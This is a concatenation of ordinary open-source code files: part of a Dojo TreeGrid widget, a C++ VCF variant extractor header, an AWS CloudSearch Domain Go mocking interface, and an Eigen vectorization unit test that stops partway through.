// Default open to false for tree models, true for other tree
// grids.
this.defaultOpen = false;
}
var def = this.defaultOpen;
this.openAtLevels = array.map(this.openAtLevels, function(l){
if(typeof l == "string"){
switch(l.toLowerCase()){
case "true":
return true;
break;
case "false":
return false;
break;
default:
var r = parseInt(l, 10);
if(isNaN(r)){
return def;
}
return r;
break;
}
}
return l;
});
this._by_idty_paths = {};
this.inherited(arguments);
},
postCreate: function(){
this.inherited(arguments);
if(this.treeModel){
this._setModel(this.treeModel);
}
},
setModel: function(treeModel){
this._setModel(treeModel);
this._refresh(true);
},
_setModel: function(treeModel){
if(treeModel && (!ForestStoreModel || !(treeModel instanceof ForestStoreModel))){
throw new Error("dojox.grid.TreeGrid: treeModel must be an instance of dijit.tree.ForestStoreModel");
}
this.treeModel = treeModel;
domClass.toggle(this.domNode, "dojoxGridTreeModel", this.treeModel ? true : false);
this._setQuery(treeModel ? treeModel.query : null);
this._setStore(treeModel ? treeModel.store : null);
},
createScroller: function(){
this.inherited(arguments);
this.scroller._origDefaultRowHeight = this.scroller.defaultRowHeight;
},
createManagers: function(){
// summary:
// create grid managers for various tasks including rows, focus, selection, editing
// row manager
this.rows = new _RowManager(this);
// focus manager
this.focus = new _TreeFocusManager(this);
// edit manager
this.edit = new _EditManager(this);
},
_setStore: function(store){
this.inherited(arguments);
if(this.treeModel&&!this.treeModel.root.children){
this.treeModel.root.children = [];
}
if(this.aggregator){
this.aggregator.store = store;
}
},
getDefaultOpenState: function(cellDef, item){
// summary:
// Returns the default open state for the given definition and item
// It reads from the openAtLevels and defaultOpen values of the
// grid to calculate if the given item should default to open or
// not.
var cf;
var store = this.store;
if(this.treeModel){ return this.defaultOpen; }
if(!cellDef || !store || !store.isItem(item) ||
!(cf = this.aggregator.childFields[cellDef.level])){
return this.defaultOpen;
}
if(this.openAtLevels.length > cellDef.level){
var dVal = this.openAtLevels[cellDef.level];
if(typeof dVal == "boolean"){
return dVal;
}else if(typeof dVal == "number"){
return (store.getValues(item, cf).length <= dVal);
}
}
return this.defaultOpen;
},
onStyleRow: function(row){
if(!this.layout._isCollapsable){
this.inherited(arguments);
return;
}
var base = domAttr.get(row.node, 'dojoxTreeGridBaseClasses');
if(base){
row.customClasses = base;
}
var i = row;
var tagName = i.node.tagName.toLowerCase();
i.customClasses += (i.odd?" dojoxGridRowOdd":"") +
(i.selected&&tagName=='tr'?" dojoxGridRowSelected":"") +
(i.over&&tagName=='tr'?" dojoxGridRowOver":"");
this.focus.styleRow(i);
this.edit.styleRow(i);
},
styleRowNode: function(inRowIndex, inRowNode){
if(inRowNode){
if(inRowNode.tagName.toLowerCase() == 'div' && this.aggregator){
query("tr[dojoxTreeGridPath]", inRowNode).forEach(function(rowNode){
this.rows.styleRowNode(domAttr.get(rowNode, 'dojoxTreeGridPath'), rowNode);
},this);
}
this.rows.styleRowNode(inRowIndex, inRowNode);
}
},
onCanSelect: function(inRowIndex){
var nodes = query("tr[dojoxTreeGridPath='" + inRowIndex + "']", this.domNode);
if(nodes.length){
if(domClass.contains(nodes[0], 'dojoxGridSummaryRow')){
return false;
}
}
return this.inherited(arguments);
},
onKeyDown: function(e){
if(e.altKey || e.metaKey){
return;
}
switch(e.keyCode){
case keys.UP_ARROW:
if(!this.edit.isEditing() && this.focus.rowIndex != "0"){
event.stop(e);
this.focus.move(-1, 0);
}
break;
case keys.DOWN_ARROW:
var currPath = new TreePath(this.focus.rowIndex, this);
var lastPath = new TreePath(this.rowCount-1, this);
lastPath = lastPath.lastChild(true);
if(!this.edit.isEditing() && currPath.toString() != lastPath.toString()){
event.stop(e);
this.focus.move(1, 0);
}
break;
default:
this.inherited(arguments);
break;
}
},
canEdit: function(inCell, inRowIndex){
var node = inCell.getNode(inRowIndex);
return node && this._canEdit;
},
doApplyCellEdit: function(inValue, inRowIndex, inAttrName){
var item = this.getItem(inRowIndex);
var oldValue = this.store.getValue(item, inAttrName);
if(typeof oldValue == 'number'){
inValue = isNaN(inValue) ? inValue : parseFloat(inValue);
}else if(typeof oldValue == 'boolean'){
inValue = inValue == 'true' ? true : inValue == 'false' ? false : inValue;
}else if(oldValue instanceof Date){
var asDate = new Date(inValue);
inValue = isNaN(asDate.getTime()) ? inValue : asDate;
}
this.store.setValue(item, inAttrName, inValue);
this.onApplyCellEdit(inValue, inRowIndex, inAttrName);
}
});
TreeGrid.markupFactory = function(props, node, ctor, cellFunc){
var widthFromAttr = function(n){
var w = domAttr.get(n, "width")||"auto";
if((w != "auto")&&(w.slice(-2) != "em")&&(w.slice(-1) != "%")){
w = parseInt(w, 10)+"px";
}
return w;
};
var cellsFromMarkup = function(table){
var rows;
// Don't support colgroup on our grid - single view, single row only
if(table.nodeName.toLowerCase() == "table" &&
query("> colgroup", table).length === 0 &&
(rows = query("> thead > tr", table)).length == 1){
var tr = rows[0];
return query("> th", rows[0]).map(function(th){
// Grab type and field (the only ones that are shared
var cell = {
type: lang.trim(domAttr.get(th, "cellType")||""),
field: lang.trim(domAttr.get(th, "field")||"")
};
if(cell.type){
cell.type = lang.getObject(cell.type);
}
var subTable = query("> table", th)[0];
if(subTable){
// If we have a subtable, we are an aggregate and a summary cell
cell.name = "";
cell.children = cellsFromMarkup(subTable);
if(domAttr.has(th, "itemAggregates")){
cell.itemAggregates = array.map(domAttr.get(th, "itemAggregates").split(","), function(v){
return lang.trim(v);
});
}else{
cell.itemAggregates = [];
}
if(domAttr.has(th, "aggregate")){
cell.aggregate = domAttr.get(th, "aggregate");
}
cell.type = cell.type || dojox.grid.cells.SubtableCell;
}else{
// Grab our other stuff we need (mostly what's in the normal
// Grid)
cell.name = lang.trim(domAttr.get(th, "name")||th.innerHTML);
if(domAttr.has(th, "width")){
cell.width = widthFromAttr(th);
}
if(domAttr.has(th, "relWidth")){
cell.relWidth = window.parseInt(domAttr.get(th, "relWidth"), 10);
}
if(domAttr.has(th, "hidden")){
cell.hidden = domAttr.get(th, "hidden") == "true";
}
cell.field = cell.field||cell.name;
DataGrid.cell_markupFactory(cellFunc, th, cell);
cell.type = cell.type || dojox.grid.cells.Cell;
}
if(cell.type && cell.type.markupFactory){
cell.type.markupFactory(th, cell);
}
return cell;
});
}
return [];
};
var rows;
if( !props.structure ){
var row = cellsFromMarkup(node);
if(row.length){
// Set our structure here - so that we don't try and set it in the
// markup factory
props.structure = [{__span: Infinity, cells:[row]}];
}
}
return DataGrid.markupFactory(props, node, ctor, cellFunc);
};
return TreeGrid;
}); | {
"pile_set_name": "Github"
} |
// Copyright (c) 2015-2020 Daniel Cooke
// Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#ifndef vcf_extractor_hpp
#define vcf_extractor_hpp
#include <vector>
#include <memory>
#include <boost/filesystem.hpp>
#include <boost/optional.hpp>
#include "io/variant/vcf.hpp"
#include "core/types/variant.hpp"
#include "variant_generator.hpp"
namespace octopus {
class GenomicRegion;
namespace coretools {
class VcfExtractor : public VariantGenerator
{
public:
struct Options
{
Variant::MappingDomain::Size max_variant_size = 100;
bool extract_filtered = false;
boost::optional<VcfRecord::QualityType> min_quality = boost::none;
bool split_complex = false;
};
VcfExtractor() = delete;
VcfExtractor(std::unique_ptr<VcfReader> reader);
VcfExtractor(std::unique_ptr<VcfReader> reader, Options options);
VcfExtractor(const VcfExtractor&) = default;
VcfExtractor& operator=(const VcfExtractor&) = default;
VcfExtractor(VcfExtractor&&) = default;
VcfExtractor& operator=(VcfExtractor&&) = default;
~VcfExtractor() override = default;
private:
std::unique_ptr<VariantGenerator> do_clone() const override;
std::vector<Variant> do_generate(const RegionSet& regions) const override;
std::string name() const override;
mutable std::shared_ptr<VcfReader> reader_;
Options options_;
std::vector<Variant> fetch_variants(const GenomicRegion& region) const;
bool is_good(const VcfRecord& record) const;
};
} // namespace coretools
} // namespace octopus
#endif
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package cloudsearchdomainiface provides an interface to enable mocking the Amazon CloudSearch Domain service client
// for testing your code.
//
// It is important to note that this interface will have breaking changes
// when the service model is updated and adds new API operations, paginators,
// and waiters.
package cloudsearchdomainiface
import (
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/request"
"github.com/aws/aws-sdk-go/service/cloudsearchdomain"
)
// CloudSearchDomainAPI provides an interface to enable mocking the
// cloudsearchdomain.CloudSearchDomain service client's API operation,
// paginators, and waiters. This make unit testing your code that calls out
// to the SDK's service client's calls easier.
//
// The best way to use this interface is so the SDK's service client's calls
// can be stubbed out for unit testing your code with the SDK without needing
// to inject custom request handlers into the SDK's request pipeline.
//
// // myFunc uses an SDK service client to make a request to
// // Amazon CloudSearch Domain.
// func myFunc(svc cloudsearchdomainiface.CloudSearchDomainAPI) bool {
// // Make svc.Search request
// }
//
// func main() {
// sess := session.New()
// svc := cloudsearchdomain.New(sess)
//
// myFunc(svc)
// }
//
// In your _test.go file:
//
// // Define a mock struct to be used in your unit tests of myFunc.
// type mockCloudSearchDomainClient struct {
// cloudsearchdomainiface.CloudSearchDomainAPI
// }
// func (m *mockCloudSearchDomainClient) Search(input *cloudsearchdomain.SearchInput) (*cloudsearchdomain.SearchOutput, error) {
// // mock response/functionality
// }
//
// func TestMyFunc(t *testing.T) {
// // Setup Test
// mockSvc := &mockCloudSearchDomainClient{}
//
// myfunc(mockSvc)
//
// // Verify myFunc's functionality
// }
//
// It is important to note that this interface will have breaking changes
// when the service model is updated and adds new API operations, paginators,
// and waiters. Its suggested to use the pattern above for testing, or using
// tooling to generate mocks to satisfy the interfaces.
type CloudSearchDomainAPI interface {
Search(*cloudsearchdomain.SearchInput) (*cloudsearchdomain.SearchOutput, error)
SearchWithContext(aws.Context, *cloudsearchdomain.SearchInput, ...request.Option) (*cloudsearchdomain.SearchOutput, error)
SearchRequest(*cloudsearchdomain.SearchInput) (*request.Request, *cloudsearchdomain.SearchOutput)
Suggest(*cloudsearchdomain.SuggestInput) (*cloudsearchdomain.SuggestOutput, error)
SuggestWithContext(aws.Context, *cloudsearchdomain.SuggestInput, ...request.Option) (*cloudsearchdomain.SuggestOutput, error)
SuggestRequest(*cloudsearchdomain.SuggestInput) (*request.Request, *cloudsearchdomain.SuggestOutput)
UploadDocuments(*cloudsearchdomain.UploadDocumentsInput) (*cloudsearchdomain.UploadDocumentsOutput, error)
UploadDocumentsWithContext(aws.Context, *cloudsearchdomain.UploadDocumentsInput, ...request.Option) (*cloudsearchdomain.UploadDocumentsOutput, error)
UploadDocumentsRequest(*cloudsearchdomain.UploadDocumentsInput) (*request.Request, *cloudsearchdomain.UploadDocumentsOutput)
}
var _ CloudSearchDomainAPI = (*cloudsearchdomain.CloudSearchDomain)(nil)
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2015 Gael Guennebaud <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifdef EIGEN_TEST_PART_1
#define EIGEN_UNALIGNED_VECTORIZE 1
#endif
#ifdef EIGEN_TEST_PART_2
#define EIGEN_UNALIGNED_VECTORIZE 0
#endif
#ifdef EIGEN_DEFAULT_TO_ROW_MAJOR
#undef EIGEN_DEFAULT_TO_ROW_MAJOR
#endif
#define EIGEN_DEBUG_ASSIGN
#include "main.h"
#include <typeinfo>
using internal::demangle_flags;
using internal::demangle_traversal;
using internal::demangle_unrolling;
template<typename Dst, typename Src>
bool test_assign(const Dst&, const Src&, int traversal, int unrolling)
{
typedef internal::copy_using_evaluator_traits<internal::evaluator<Dst>,internal::evaluator<Src>, internal::assign_op<typename Dst::Scalar,typename Src::Scalar> > traits;
bool res = traits::Traversal==traversal;
if(unrolling==InnerUnrolling+CompleteUnrolling)
res = res && (int(traits::Unrolling)==InnerUnrolling || int(traits::Unrolling)==CompleteUnrolling);
else
res = res && int(traits::Unrolling)==unrolling;
if(!res)
{
std::cerr << "Src: " << demangle_flags(Src::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Src>::Flags) << std::endl;
std::cerr << "Dst: " << demangle_flags(Dst::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Dst>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Dst, typename Src>
bool test_assign(int traversal, int unrolling)
{
typedef internal::copy_using_evaluator_traits<internal::evaluator<Dst>,internal::evaluator<Src>, internal::assign_op<typename Dst::Scalar,typename Src::Scalar> > traits;
bool res = traits::Traversal==traversal && traits::Unrolling==unrolling;
if(!res)
{
std::cerr << "Src: " << demangle_flags(Src::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Src>::Flags) << std::endl;
std::cerr << "Dst: " << demangle_flags(Dst::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Dst>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Xpr>
bool test_redux(const Xpr&, int traversal, int unrolling)
{
typedef typename Xpr::Scalar Scalar;
typedef internal::redux_traits<internal::scalar_sum_op<Scalar,Scalar>,internal::redux_evaluator<Xpr> > traits;
bool res = traits::Traversal==traversal && traits::Unrolling==unrolling;
if(!res)
{
std::cerr << demangle_flags(Xpr::Flags) << std::endl;
std::cerr << demangle_flags(internal::evaluator<Xpr>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Scalar, bool Enable = internal::packet_traits<Scalar>::Vectorizable>
struct vectorization_logic
{
typedef internal::packet_traits<Scalar> PacketTraits;
typedef typename internal::packet_traits<Scalar>::type PacketType;
typedef typename internal::unpacket_traits<PacketType>::half HalfPacketType;
enum {
PacketSize = internal::unpacket_traits<PacketType>::size,
HalfPacketSize = internal::unpacket_traits<HalfPacketType>::size
};
static void run()
{
typedef Matrix<Scalar,PacketSize,1> Vector1;
typedef Matrix<Scalar,Dynamic,1> VectorX;
typedef Matrix<Scalar,Dynamic,Dynamic> MatrixXX;
typedef Matrix<Scalar,PacketSize,PacketSize> Matrix11;
typedef Matrix<Scalar,2*PacketSize,2*PacketSize> Matrix22;
typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16> Matrix44;
typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16,DontAlign|EIGEN_DEFAULT_MATRIX_STORAGE_ORDER_OPTION> Matrix44u;
typedef Matrix<Scalar,4*PacketSize,4*PacketSize,ColMajor> Matrix44c;
typedef Matrix<Scalar,4*PacketSize,4*PacketSize,RowMajor> Matrix44r;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1)
> Matrix1;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1),
DontAlign|((Matrix1::Flags&RowMajorBit)?RowMajor:ColMajor)> Matrix1u;
// this type is made such that it can only be vectorized when viewed as a linear 1D vector
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 6 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?2:3) : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 6 : PacketSize==4 ? 2 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?3:2) : /*PacketSize==1 ?*/ 3)
> Matrix3;
#if !EIGEN_GCC_AND_ARCH_DOESNT_WANT_STACK_ALIGNMENT
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template cast<Scalar>(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix44(),Matrix44()+Matrix44(),
InnerVectorizedTraversal,InnerUnrolling));
VERIFY(test_assign(Matrix44u(),Matrix44()+Matrix44(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearTraversal,
EIGEN_UNALIGNED_VECTORIZE ? InnerUnrolling : NoUnrolling));
VERIFY(test_assign(Matrix1(),Matrix1()+Matrix1(),
(Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal,
CompleteUnrolling));
VERIFY(test_assign(Matrix1u(),Matrix1()+Matrix1(),
EIGEN_UNALIGNED_VECTORIZE ? ((Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal)
: LinearTraversal, CompleteUnrolling));
VERIFY(test_assign(Matrix44c().col(1),Matrix44c().col(2)+Matrix44c().col(3),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix44r().row(2),Matrix44r().row(1)+Matrix44r().row(1),
InnerVectorizedTraversal,CompleteUnrolling));
if(PacketSize>1)
{
typedef Matrix<Scalar,3,3,ColMajor> Matrix33c;
typedef Matrix<Scalar,3,1,ColMajor> Vector3;
VERIFY(test_assign(Matrix33c().row(2),Matrix33c().row(1)+Matrix33c().row(1),
LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector3(),Vector3()+Vector3(),
EIGEN_UNALIGNED_VECTORIZE ? (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearTraversal), CompleteUnrolling));
VERIFY(test_assign(Matrix33c().col(0),Matrix33c().col(1)+Matrix33c().col(1),
EIGEN_UNALIGNED_VECTORIZE ? (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : (HalfPacketSize==1 ? SliceVectorizedTraversal : LinearTraversal),
((!EIGEN_UNALIGNED_VECTORIZE) && HalfPacketSize==1) ? NoUnrolling : CompleteUnrolling));
VERIFY(test_assign(Matrix3(),Matrix3().cwiseProduct(Matrix3()),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix<Scalar,17,17>(),Matrix<Scalar,17,17>()+Matrix<Scalar,17,17>(),
HalfPacketSize==1 ? InnerVectorizedTraversal :
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal :
LinearTraversal,
NoUnrolling));
VERIFY(test_assign(Matrix11(), Matrix11()+Matrix11(),InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(2,3)+Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(8,4),
(EIGEN_UNALIGNED_VECTORIZE) ? InnerVectorizedTraversal : DefaultTraversal, CompleteUnrolling|InnerUnrolling));
VERIFY(test_assign(Vector1(),Matrix11()*Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix11().lazyProduct(Matrix11()),
InnerVectorizedTraversal,InnerUnrolling+CompleteUnrolling));
}
VERIFY(test_redux(Vector1(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<Scalar,PacketSize,3>(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix3(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44(),
LinearVectorizedTraversal,NoUnrolling));
VERIFY(test_redux(Matrix44().template block<(Matrix1::Flags&RowMajorBit)?4:PacketSize,(Matrix1::Flags&RowMajorBit)?PacketSize:4>(1,2),
DefaultTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44c().template block<2*PacketSize,1>(1,2),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44r().template block<1,2*PacketSize>(2,1),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY((test_assign<
Map<Matrix22, AlignedMax, OuterStride<3*PacketSize> >,
Matrix22
>(InnerVectorizedTraversal,CompleteUnrolling)));
VERIFY((test_assign<
Map<Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>, AlignedMax, InnerStride<3*PacketSize> >,
Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>
>(DefaultTraversal,PacketSize>=8?InnerUnrolling:CompleteUnrolling)));
VERIFY((test_assign(Matrix11(), Matrix<Scalar,PacketSize,EIGEN_PLAIN_ENUM_MIN(2,PacketSize)>()*Matrix<Scalar,EIGEN_PLAIN_ENUM_MIN(2,PacketSize),PacketSize>(),
InnerVectorizedTraversal, CompleteUnrolling)));
#endif
VERIFY(test_assign(MatrixXX(10,10),MatrixXX(20,20).block(10,10,2,3),
SliceVectorizedTraversal,NoUnrolling));
VERIFY(test_redux(VectorX(10),
LinearVectorizedTraversal,NoUnrolling));
}
};
template<typename Scalar> struct vectorization_logic<Scalar,false>
{
static void run() {}
};
template<typename Scalar, bool Enable = !internal::is_same<typename internal::unpacket_traits<typename internal::packet_traits<Scalar>::type>::half,
typename internal::packet_traits<Scalar>::type>::value >
struct vectorization_logic_half
{
typedef internal::packet_traits<Scalar> PacketTraits;
typedef typename internal::unpacket_traits<typename internal::packet_traits<Scalar>::type>::half PacketType;
enum {
PacketSize = internal::unpacket_traits<PacketType>::size
};
static void run()
{
typedef Matrix<Scalar,PacketSize,1> Vector1;
typedef Matrix<Scalar,PacketSize,PacketSize> Matrix11;
typedef Matrix<Scalar,5*PacketSize,7,ColMajor> Matrix57;
typedef Matrix<Scalar,3*PacketSize,5,ColMajor> Matrix35;
typedef Matrix<Scalar,5*PacketSize,7,DontAlign|ColMajor> Matrix57u;
// typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16> Matrix44;
// typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16,DontAlign|EIGEN_DEFAULT_MATRIX_STORAGE_ORDER_OPTION> Matrix44u;
// typedef Matrix<Scalar,4*PacketSize,4*PacketSize,ColMajor> Matrix44c;
// typedef Matrix<Scalar,4*PacketSize,4*PacketSize,RowMajor> Matrix44r;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1)
> Matrix1;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1),
DontAlign|((Matrix1::Flags&RowMajorBit)?RowMajor:ColMajor)> Matrix1u;
// this type is made such that it can only be vectorized when viewed as a linear 1D vector
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 6 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?2:3) : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 6 : PacketSize==4 ? 2 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?3:2) : /*PacketSize==1 ?*/ 3)
> Matrix3;
#if !EIGEN_GCC_AND_ARCH_DOESNT_WANT_STACK_ALIGNMENT
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template segment<PacketSize>(0).derived(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Scalar(2.1)*Vector1()-Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),(Scalar(2.1)*Vector1().template segment<PacketSize>(0)-Vector1().template segment<PacketSize>(0)).derived(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template cast<Scalar>(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix57(),Matrix57()+Matrix57(),
InnerVectorizedTraversal,InnerUnrolling));
VERIFY(test_assign(Matrix57u(),Matrix57()+Matrix57(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearTraversal,
EIGEN_UNALIGNED_VECTORIZE ? InnerUnrolling : NoUnrolling));
VERIFY(test_assign(Matrix1u(),Matrix1()+Matrix1(),
EIGEN_UNALIGNED_VECTORIZE ? ((Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,CompleteUnrolling));
if(PacketSize>1)
{
typedef Matrix<Scalar,3,3,ColMajor> Matrix33c;
VERIFY(test_assign(Matrix33c().row(2),Matrix33c().row(1)+Matrix33c().row(1),
LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix33c().col(0),Matrix33c().col(1)+Matrix33c().col(1),
EIGEN_UNALIGNED_VECTORIZE ? (PacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix3(),Matrix3().cwiseQuotient(Matrix3()),
PacketTraits::HasDiv ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix<Scalar,17,17>(),Matrix<Scalar,17,17>()+Matrix<Scalar,17,17>(),
EIGEN_UNALIGNED_VECTORIZE ? (PacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,
NoUnrolling));
VERIFY(test_assign(Matrix11(),Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(2,3)+Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(8,4),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : DefaultTraversal,PacketSize>4?InnerUnrolling:CompleteUnrolling));
VERIFY(test_assign(Vector1(),Matrix11()*Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix11().lazyProduct(Matrix11()),
InnerVectorizedTraversal,InnerUnrolling+CompleteUnrolling));
}
VERIFY(test_redux(Vector1(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<Scalar,PacketSize,3>(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix3(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix35(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix57().template block<PacketSize,3>(1,0),
DefaultTraversal,CompleteUnrolling));
VERIFY((test_assign<
Map<Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>, AlignedMax, InnerStride<3*PacketSize> >,
Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>
>(DefaultTraversal,CompleteUnrolling)));
VERIFY((test_assign(Matrix57(), Matrix<Scalar,5*PacketSize,3>()*Matrix<Scalar,3,7>(),
InnerVectorizedTraversal, InnerUnrolling|CompleteUnrolling)));
#endif
}
};
template<typename Scalar> struct vectorization_logic_half<Scalar,false>
{
static void run() {}
};
void test_vectorization_logic()
{
#ifdef EIGEN_VECTORIZE
CALL_SUBTEST( vectorization_logic<int>::run() );
CALL_SUBTEST( vectorization_logic<float>::run() );
